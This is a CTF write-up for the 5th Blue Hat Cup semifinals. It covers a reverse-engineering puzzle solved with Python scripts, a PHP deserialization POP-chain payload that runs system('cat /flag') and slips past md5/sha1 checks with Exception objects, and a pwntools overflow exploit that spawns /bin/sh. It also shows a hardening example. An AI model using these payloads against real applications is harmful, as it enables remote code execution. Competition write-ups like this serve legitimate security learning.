
5th Blue Hat Cup (蓝帽杯) Semifinals, Partial Writeup: RE: ser_leak, WEB: Jack and Rose (杰克与肉丝), PWN: cover

Contents

  • RE: ser_leak
  • WEB: Jack and Rose (杰克与肉丝)
  • PWN: cover

RE: ser_leak

This challenge is a reused problem that has appeared before:

x1-x5:

# Population count: number of 1 bits in x.
def func2(x):
	if x == 0:
		return 0
	return (x % 2) + func2(x // 2)

# Parity of x (1 if odd, 0 if even).
def func3(x):
	return x % 2

# Binary search for the largest m in [L, R] with m * m <= N.
def func1(N, L, R):
	if L == R:
		return L
	mid = (L + R + 1) // 2
	if N < mid * mid:
		return func1(N, L, mid - 1)
	else:
		return func1(N, mid, R)

# Integer (floor) square root of x.
def _func1(x):
	return func1(x, 1, x)



if __name__ == '__main__':
	x1_flag = False
	x2_flag = False
	x3_flag = False
	x4_flag = False
	x5_flag = False
	# For i in this range the integer square root lies between 3162 and 9999.
	for i in range(10000000, 100000000):
		# Keep only candidates with an odd number of set bits.
		if func3(func2(i)) != 1:
			continue
		# Print the first candidate whose integer square root equals each target.
		if _func1(i) == 963 and not x1_flag:
			print("x1:",i)
			x1_flag = True
		if _func1(i) == 4396 and not x2_flag:
			print("x2:",i)
			x2_flag = True
		if _func1(i) == 6666 and not x3_flag:
			print("x3:",i)
			x3_flag = True
		if _func1(i) == 1999 and not x4_flag:
			print("x4:",i)
			x4_flag = True
		if _func1(i) == 3141 and not x5_flag:
			print("x5:",i)
			x5_flag = True


x6:

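# Next trial divisor: m + 1 while m * m <= n, otherwise 0 (no divisors left to try).
def nextm(n, m):
	if m*m <= n:
		return m+1
	else:
		return 0

# Returns n if m does not divide n, otherwise 0.
def nextn(n, m):
	return (n % m != 0) * n

# Recursive trial division: 0 once a divisor is found, 1 when the divisors run out.
def test(n, m):
	if n == 0:
		return 0
	if m == 0:
		return 1
	return test(nextn(n, m), nextm(n, m))

# Primality test: 1 if x is prime, 0 otherwise.
def func4(x):
	if x == 1:
		return 0
	if x == 2:
		return 1
	return test(x, 2)


if __name__ == '__main__':
	# Count the primes among the odd numbers 1, 3, 5, 7.
	x6 = 0
	for i in range(1, 5):
		if func4(i*2-1) == 1:
			x6 += 1
	print(x6)
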

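WEB: Jack and Rose (杰克与肉丝)

Key points:

1. Building a PHP deserialization POP chain

2. Bypassing the md5 and sha1 checks with the Exception class

Reference: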

https://blog.csdn.net/LYJ20010728/article/details/114493052

Code:

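<?php
// Payload generator: rebuilds the object graph locally and prints it
// as a URL-encoded serialized string.
class Titanic{
    public $people;
    public $ship;
    function __construct(){
        $this->people = new Jack();
        $this->ship = new Love();
    }
}

class Jack{
    private $action;
    // Runs on a write to an inaccessible property: calls the method
    // named $a on the assigned value $b.
    function __set($a, $b)
    {
        $b->$a();
    }
}

class Love {
    public $var;
    function __construct(){
        $this->var = new Rose();
    }
}

class Rose {
    public $var1,$var2;
    public function __construct(){
        $cmd ='system("cat /flag");?>';
        // Both exceptions are created on the same line: their string forms
        // (message, file, line) are identical, while the objects differ (code 0 vs 1).
        $a = new Exception($cmd);$b = new Exception($cmd,1);
        $this->var1 = $a;
        $this->var2 = $b;
    }
}
$f = new Titanic();
echo urlencode(serialize($f));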
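
Key point 2 above, seen from the side of the code being attacked, as an added example that is not part of the original writeup or the challenge source. `weak_check()` is an assumed shape of the md5/sha1 comparison, and `strict_check()` together with the `allowed_classes` option shows the hardened form; both function names are hypothetical.

```php
<?php
// Added example. weak_check() is an assumed shape of the comparison,
// not the challenge's source; all names here are hypothetical.

// Weak: md5()/sha1() silently cast objects through __toString(),
// so two different objects with the same string form pass.
function weak_check($a, $b): bool {
    return $a !== $b && md5($a) === md5($b) && sha1($a) === sha1($b);
}

// Hardened: reject anything that is not a plain string before hashing.
function strict_check($a, $b): bool {
    return is_string($a) && is_string($b) && weak_check($a, $b);
}

// Constructed input: two Exception objects created on ONE line.
// Exception::__toString() prints class, message, file, line and trace,
// but not the code, so the objects differ while their strings match.
$a = new Exception('demo'); $b = new Exception('demo', 1);

echo 'same string form: ', var_export((string)$a === (string)$b, true), "\n";
echo 'weak_check:       ', var_export(weak_check($a, $b), true), "\n";
echo 'strict_check:     ', var_export(strict_check($a, $b), true), "\n";

// Deserialization side: refuse to instantiate classes from untrusted data.
// Objects then arrive as inert __PHP_Incomplete_Class values, so no magic
// methods (__set, __toString, ...) of application classes can run.
$blob = serialize([$a, $b]);            // stands in for untrusted input
$safe = unserialize($blob, ['allowed_classes' => false]);
echo 'class after safe unserialize: ', get_class($safe[0]), "\n";
echo 'strict_check on it:           ',
    var_export(strict_check($safe[0], $safe[1]), true), "\n";
```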
           

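PWN: cover

Write that address into buf so that the input overflows into the position of v5; the function is then called with the fastcall convention and /bin/sh is executed.

The exploit is as follows: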

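from pwn import *
context.log_level = 'debug'

# Local run; use the remote line instead for the challenge server.
p = process("./pwn")
#p = remote("118.190.62.234",12435)
p.recv()
# The address goes into buf; the extra byte is the overflow toward v5 described above.
p.send(p32(0x80484D2)+b'\x24')
p.recv()
p.send(b'/bin/sh')
p.interactive()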